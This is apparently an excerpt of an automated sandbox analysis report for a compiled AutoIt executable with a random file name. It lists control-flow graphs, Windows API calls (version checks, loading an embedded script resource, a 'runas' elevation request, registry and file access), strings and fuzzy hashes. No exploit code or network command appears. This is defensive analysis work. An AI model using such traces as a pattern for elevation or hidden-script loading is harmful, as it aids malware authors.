99019->98993 99020 aa2f8d 99019->99020 99061 ac4a28 40 API calls 3 library calls 99020->99061 99022 aa2f98 99023 aa2fdc 99022->99023 99062 aa3084 22 API calls 99022->99062 99023->99007 99024 aa2fe8 99023->99024 99024->99017 99064 aa63eb 22 API calls 99024->99064 99027 aa2fbf 99029 aaa8c7 22 API calls 99027->99029 99028 aa2ff8 99065 aa6a50 22 API calls 99028->99065 99030 aa2fcd 99029->99030 99063 aa3084 22 API calls 99030->99063 99033 aa3006 99066 aa70b0 23 API calls 99033->99066 99035 aa3021 99038 aa3065 99035->99038 99067 aa6f88 22 API calls 99035->99067 99068 aa70b0 23 API calls 99035->99068 99069 aa3084 22 API calls 99035->99069 99041 aa4af0 __wsopen_s 99040->99041 99042 aa6b57 22 API calls 99041->99042 99043 aa4b22 99041->99043 99042->99043 99044 aa4c6d 22 API calls 99043->99044 99053 aa4b58 99043->99053 99044->99043 99045 aa9cb3 22 API calls 99047 aa4c52 99045->99047 99046 aa9cb3 22 API calls 99046->99053 99048 aa515f 22 API calls 99047->99048 99051 aa4c5e 99048->99051 99049 aa4c6d 22 API calls 99049->99053 99050 aa515f 22 API calls 99050->99053 99051->98965 99052 aa4c29 99052->99045 99052->99051 99053->99046 99053->99049 99053->99050 99053->99052 99054->98982 99055->98987 99056->98997 99057->99006 99058->99009 99059->99013 99060->99019 99061->99022 99062->99027 99063->99023 99064->99028 99065->99033 99066->99035 99067->99035 99068->99035 99069->99035 99070->98989 99071->98993 99072->98999 99073->99007 99074->99017

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 234 aa42de-aa434d call aaa961 GetVersionExW call aa6b57 239 ae3617-ae362a 234->239 240 aa4353 234->240 242 ae362b-ae362f 239->242 241 aa4355-aa4357 240->241 245 aa435d-aa43bc call aa93b2 call aa37a0 241->245 246 ae3656 241->246 243 ae3632-ae363e 242->243 244 ae3631 242->244 243->242 247 ae3640-ae3642 243->247 244->243 263 ae37df-ae37e6 245->263 264 aa43c2-aa43c4 245->264 250 ae365d-ae3660 246->250 247->241 249 ae3648-ae364f 247->249 249->239 252 ae3651 249->252 253 aa441b-aa4435 GetCurrentProcess IsWow64Process 250->253 254 ae3666-ae36a8 250->254 252->246 256 aa4437 253->256 257 aa4494-aa449a 253->257 254->253 258 ae36ae-ae36b1 254->258 260 aa443d-aa4449 256->260 257->260 261 ae36db-ae36e5 258->261 262 ae36b3-ae36bd 258->262 265 aa444f-aa445e LoadLibraryA 260->265 266 ae3824-ae3828 GetSystemInfo 260->266 270 ae36f8-ae3702 261->270 271 ae36e7-ae36f3 261->271 267 ae36bf-ae36c5 262->267 268 ae36ca-ae36d6 262->268 272 ae37e8 263->272 273 ae3806-ae3809 263->273 264->250 269 aa43ca-aa43dd 264->269 279 aa449c-aa44a6 GetSystemInfo 265->279 280 aa4460-aa446e GetProcAddress 265->280 267->253 268->253 281 ae3726-ae372f 269->281 282 aa43e3-aa43e5 269->282 275 ae3704-ae3710 270->275 276 ae3715-ae3721 270->276 271->253 274 ae37ee 272->274 277 ae380b-ae381a 273->277 278 ae37f4-ae37fc 273->278 274->278 275->253 276->253 277->274 287 ae381c-ae3822 277->287 278->273 289 aa4476-aa4478 279->289 280->279 288 aa4470-aa4474 GetNativeSystemInfo 280->288 285 ae373c-ae3748 281->285 286 ae3731-ae3737 281->286 283 aa43eb-aa43ee 282->283 284 ae374d-ae3762 282->284 290 aa43f4-aa440f 283->290 291 ae3791-ae3794 283->291 292 ae376f-ae377b 284->292 293 ae3764-ae376a 284->293 285->253 286->253 287->278 288->289 294 aa447a-aa447b FreeLibrary 289->294 295 aa4481-aa4493 289->295 296 ae3780-ae378c 290->296 297 aa4415 290->297 291->253 298 ae379a-ae37c1 291->298 292->253 293->253 294->295 296->253 297->253 299 ae37ce-ae37da 298->299 300 ae37c3-ae37c9 298->300 299->253 300->253
                                                                                                    APIs
                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00AA430D
                                                                                                      • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                                                                                                    • GetCurrentProcess.KERNEL32(?,00B3CB64,00000000,?,?), ref: 00AA4422
                                                                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00AA4429
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00AA4454
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AA4466
                                                                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00AA4474
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 00AA447B
                                                                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 00AA44A0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                    • API String ID: 3290436268-3101561225
                                                                                                    • Opcode ID: c87386940259280d32d87b1a354880ac706b92295ed3d48529ad40afb2c977bc
                                                                                                    • Instruction ID: 9d279624437f9a59dd468a3096eb8b8f671cc8e033a3463b36224515468e012d
                                                                                                    • Opcode Fuzzy Hash: c87386940259280d32d87b1a354880ac706b92295ed3d48529ad40afb2c977bc
                                                                                                    • Instruction Fuzzy Hash: 44A1D67290A2C0FFCB11CB7D7C451997FF46B6A300B168C99E08DA7AE2DB604584DB39

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 637 aa42a2-aa42ba CreateStreamOnHGlobal 638 aa42da-aa42dd 637->638 639 aa42bc-aa42d3 FindResourceExW 637->639 640 aa42d9 639->640 641 ae35ba-ae35c9 LoadResource 639->641 640->638 641->640 642 ae35cf-ae35dd SizeofResource 641->642 642->640 643 ae35e3-ae35ee LockResource 642->643 643->640 644 ae35f4-ae3612 643->644 644->640
                                                                                                    APIs
                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00AA50AA,?,?,00000000,00000000), ref: 00AA42B2
                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00AA50AA,?,?,00000000,00000000), ref: 00AA42C9
                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00AA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00AA4F20), ref: 00AE35BE
                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00AA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00AA4F20), ref: 00AE35D3
                                                                                                    • LockResource.KERNEL32(00AA50AA,?,?,00AA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00AA4F20,?), ref: 00AE35E6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                    • String ID: SCRIPT
                                                                                                    • API String ID: 3051347437-3967369404
                                                                                                    • Opcode ID: 99dd4a00ea63c583c0887f9465fb2f115afa3a45432539d44e7bde91a1a6d6b2
                                                                                                    • Instruction ID: 8bf6c444e22d256abdaa87ce9ed5e7d40808dd2e5fdb70adfda83064cb1c797d
                                                                                                    • Opcode Fuzzy Hash: 99dd4a00ea63c583c0887f9465fb2f115afa3a45432539d44e7bde91a1a6d6b2
                                                                                                    • Instruction Fuzzy Hash: 43113075240701BFD7218BA5DC49F677BB9EBC9B51F244169B50297290DBB1D8048760

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00AA2B6B
                                                                                                      • Part of subcall function 00AA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B71418,?,00AA2E7F,?,?,?,00000000), ref: 00AA3A78
                                                                                                      • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,?,?,00B62224), ref: 00AE2C10
                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?,00B62224), ref: 00AE2C17
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                                    • String ID: runas
                                                                                                    • API String ID: 448630720-4000483414
                                                                                                    • Opcode ID: 2a598341a704a308407c82f3465058d3216a133c3627b576a44d7cc1cc06a48c
                                                                                                    • Instruction ID: 4621013bce0ad0effa53d24fa8b2c74bb7742026fa94b046e506e339cc27fc7f
                                                                                                    • Opcode Fuzzy Hash: 2a598341a704a308407c82f3465058d3216a133c3627b576a44d7cc1cc06a48c
                                                                                                    • Instruction Fuzzy Hash: 361106321083415BCB14FF68D952ABEBBA8AB97340F04486CF086571E2CF24895A9722
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(?,00AE5222), ref: 00B0DBCE
                                                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 00B0DBDD
                                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00B0DBEE
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B0DBFA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2695905019-0
                                                                                                    • Opcode ID: 692ace9a3b184ea804505116e350d4cf1ff434ef2275eba92aa63e5506e90063
                                                                                                    • Instruction ID: d6237e7300428a8a87ecdc320c210c98e7fd97aedb3c303d7608a06a98cbc18e
                                                                                                    • Opcode Fuzzy Hash: 692ace9a3b184ea804505116e350d4cf1ff434ef2275eba92aa63e5506e90063
                                                                                                    • Instruction Fuzzy Hash: FAF0A03181092057D2306FF8AC0D8AF3FACDE01334B204B42F836D20E0EFB099548A95
                                                                                                    APIs
                                                                                                    • GetInputState.USER32 ref: 00AAD807
                                                                                                    • timeGetTime.WINMM ref: 00AADA07
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AADB28
                                                                                                    • TranslateMessage.USER32(?), ref: 00AADB7B
                                                                                                    • DispatchMessageW.USER32(?), ref: 00AADB89
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AADB9F
                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00AADBB1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                    • String ID:
                                                                                                    • API String ID: 2189390790-0
                                                                                                    • Opcode ID: a04fd30b3702679dd297aa6cd9ec4a6af9d19eede387982197c9e36f303698c2
                                                                                                    • Instruction ID: e41857696c4a8d12f39457467beacc43cfe63deed272693dab9764df1be60d84
                                                                                                    • Opcode Fuzzy Hash: a04fd30b3702679dd297aa6cd9ec4a6af9d19eede387982197c9e36f303698c2
                                                                                                    • Instruction Fuzzy Hash: 4842BE30608245EFD729CF24C885BBABBF4BF46314F148959F596876E1DB70E884CB92

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00AA2D07
                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00AA2D31
                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA2D42
                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00AA2D5F
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA2D6F
                                                                                                    • LoadIconW.USER32(000000A9), ref: 00AA2D85
                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA2D94
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                    • Opcode ID: 880cba9c3566544b71ddf38cbb190c971747734949722be1a0ee45117423bf23
                                                                                                    • Instruction ID: 8b4fff4dd75948aea1102ee7016bf98d3c3265bf0f0b96051fdf0ce6f642aa37
                                                                                                    • Opcode Fuzzy Hash: 880cba9c3566544b71ddf38cbb190c971747734949722be1a0ee45117423bf23
                                                                                                    • Instruction Fuzzy Hash: 9021D3B5911208EFDB009FE8EC49A9DBFB8FB08700F10451AEA15B72A0DBB145858FA4

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 302 ae065b-ae068b call ae042f 305 ae068d-ae0698 call acf2c6 302->305 306 ae06a6-ae06b2 call ad5221 302->306 311 ae069a-ae06a1 call acf2d9 305->311 312 ae06cb-ae0714 call ae039a 306->312 313 ae06b4-ae06c9 call acf2c6 call acf2d9 306->313 323 ae097d-ae0983 311->323 321 ae0716-ae071f 312->321 322 ae0781-ae078a GetFileType 312->322 313->311 325 ae0756-ae077c GetLastError call acf2a3 321->325 326 ae0721-ae0725 321->326 327 ae078c-ae07bd GetLastError call acf2a3 CloseHandle 322->327 328 ae07d3-ae07d6 322->328 325->311 326->325 332 ae0727-ae0754 call ae039a 326->332 327->311 339 ae07c3-ae07ce call acf2d9 327->339 330 ae07df-ae07e5 328->330 331 ae07d8-ae07dd 328->331 335 ae07e9-ae0837 call ad516a 330->335 336 ae07e7 330->336 331->335 332->322 332->325 345 ae0839-ae0845 call ae05ab 335->345 346 ae0847-ae086b call ae014d 335->346 336->335 339->311 345->346 353 ae086f-ae0879 call ad86ae 345->353 351 ae087e-ae08c1 346->351 352 ae086d 346->352 355 ae08e2-ae08f0 351->355 356 ae08c3-ae08c7 351->356 352->353 353->323 359 ae097b 355->359 360 ae08f6-ae08fa 355->360 356->355 358 ae08c9-ae08dd 356->358 358->355 359->323 360->359 361 ae08fc-ae092f CloseHandle call ae039a 360->361 364 ae0963-ae0977 361->364 365 ae0931-ae095d GetLastError call acf2a3 call ad5333 361->365 364->359 365->364
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AE039A: CreateFileW.KERNELBASE(00000000,00000000,?,00AE0704,?,?,00000000,?,00AE0704,00000000,0000000C), ref: 00AE03B7
                                                                                                    • GetLastError.KERNEL32 ref: 00AE076F
                                                                                                    • __dosmaperr.LIBCMT ref: 00AE0776
                                                                                                    • GetFileType.KERNELBASE(00000000), ref: 00AE0782
                                                                                                    • GetLastError.KERNEL32 ref: 00AE078C
                                                                                                    • __dosmaperr.LIBCMT ref: 00AE0795
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00AE07B5
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00AE08FF
                                                                                                    • GetLastError.KERNEL32 ref: 00AE0931
                                                                                                    • __dosmaperr.LIBCMT ref: 00AE0938
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                    • String ID: H
                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                    • Opcode ID: 94a2eb65954d62c599beb030bd0a2c2fda83b64a33485b594a89d3e59652cab8
                                                                                                    • Instruction ID: 75c17dfb9691f72a288282ecdf673f51a4f6c8d0f6d75bdfb99d225c41814dd3
                                                                                                    • Opcode Fuzzy Hash: 94a2eb65954d62c599beb030bd0a2c2fda83b64a33485b594a89d3e59652cab8
                                                                                                    • Instruction Fuzzy Hash: F2A12632A141848FDF19AF68D851FAE3BB1AB06320F24015EF815EF391DB719D92CB91

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B71418,?,00AA2E7F,?,?,?,00000000), ref: 00AA3A78
                                                                                                      • Part of subcall function 00AA3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AA3379
                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00AA356A
                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00AE318D
                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00AE31CE
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00AE3210
                                                                                                    • _wcslen.LIBCMT ref: 00AE3277
                                                                                                    • _wcslen.LIBCMT ref: 00AE3286
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                    • API String ID: 98802146-2727554177
                                                                                                    • Opcode ID: 054ac2bb3f9a0548cf358816fdb2453421689bb9a6fec43404bb41d101f8e307
                                                                                                    • Instruction ID: 9c4f4735ee4e83ee9c41021705b752b34710a44ec541037a890d6e9d19a92306
                                                                                                    • Opcode Fuzzy Hash: 054ac2bb3f9a0548cf358816fdb2453421689bb9a6fec43404bb41d101f8e307
                                                                                                    • Instruction Fuzzy Hash: F671E6724043019ED704EF65DD869ABBBF8FF99340F41082EF589971A0EF348A88CB56

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00AA2B8E
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00AA2B9D
                                                                                                    • LoadIconW.USER32(00000063), ref: 00AA2BB3
                                                                                                    • LoadIconW.USER32(000000A4), ref: 00AA2BC5
                                                                                                    • LoadIconW.USER32(000000A2), ref: 00AA2BD7
                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AA2BEF
                                                                                                    • RegisterClassExW.USER32(?), ref: 00AA2C40
                                                                                                      • Part of subcall function 00AA2CD4: GetSysColorBrush.USER32(0000000F), ref: 00AA2D07
                                                                                                      • Part of subcall function 00AA2CD4: RegisterClassExW.USER32(00000030), ref: 00AA2D31
                                                                                                      • Part of subcall function 00AA2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA2D42
                                                                                                      • Part of subcall function 00AA2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00AA2D5F
                                                                                                      • Part of subcall function 00AA2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA2D6F
                                                                                                      • Part of subcall function 00AA2CD4: LoadIconW.USER32(000000A9), ref: 00AA2D85
                                                                                                      • Part of subcall function 00AA2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA2D94
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                    • API String ID: 423443420-4155596026
                                                                                                    • Opcode ID: e56af5c8030352f32693b1880cccc3c6b779fef1ff45fa63a220676d95a907b9
                                                                                                    • Instruction ID: 6745bcdea0cf355941a444524a92b67919b1e7ccf4d92175fec13c42ea5f620f
                                                                                                    • Opcode Fuzzy Hash: e56af5c8030352f32693b1880cccc3c6b779fef1ff45fa63a220676d95a907b9
                                                                                                    • Instruction Fuzzy Hash: 65212571A00318AFDB10DFADEC45AAD7FB4FB08B50F11041AE508A76A0DBB109848FA8

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 443 aa3170-aa3185 444 aa3187-aa318a 443->444 445 aa31e5-aa31e7 443->445 447 aa31eb 444->447 448 aa318c-aa3193 444->448 445->444 446 aa31e9 445->446 449 aa31d0-aa31d8 DefWindowProcW 446->449 450 ae2dfb-ae2e23 call aa18e2 call abe499 447->450 451 aa31f1-aa31f6 447->451 452 aa3199-aa319e 448->452 453 aa3265-aa326d PostQuitMessage 448->453 454 aa31de-aa31e4 449->454 486 ae2e28-ae2e2f 450->486 456 aa31f8-aa31fb 451->456 457 aa321d-aa3244 SetTimer RegisterWindowMessageW 451->457 459 ae2e7c-ae2e90 call b0bf30 452->459 460 aa31a4-aa31a8 452->460 455 aa3219-aa321b 453->455 455->454 462 ae2d9c-ae2d9f 456->462 463 aa3201-aa3214 KillTimer call aa30f2 call aa3c50 456->463 457->455 465 aa3246-aa3251 CreatePopupMenu 457->465 459->455 479 ae2e96 459->479 466 aa31ae-aa31b3 460->466 467 ae2e68-ae2e72 call b0c161 460->467 471 ae2dd7-ae2df6 MoveWindow 462->471 472 ae2da1-ae2da5 462->472 463->455 465->455 468 ae2e4d-ae2e54 466->468 469 aa31b9-aa31be 466->469 484 ae2e77 467->484 468->449 482 ae2e5a-ae2e63 call b00ad7 468->482 477 aa3253-aa3263 call aa326f 469->477 478 aa31c4-aa31ca 469->478 471->455 480 ae2dc6-ae2dd2 SetFocus 472->480 481 ae2da7-ae2daa 472->481 477->455 478->449 478->486 479->449 480->455 481->478 487 ae2db0-ae2dc1 call aa18e2 481->487 482->449 484->455 486->449 491 ae2e35-ae2e48 call aa30f2 call aa3837 486->491 487->455 491->449
                                                                                                    APIs
                                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00AA316A,?,?), ref: 00AA31D8
                                                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,00AA316A,?,?), ref: 00AA3204
                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AA3227
                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00AA316A,?,?), ref: 00AA3232
                                                                                                    • CreatePopupMenu.USER32 ref: 00AA3246
                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00AA3267
                                                                                                    Strings
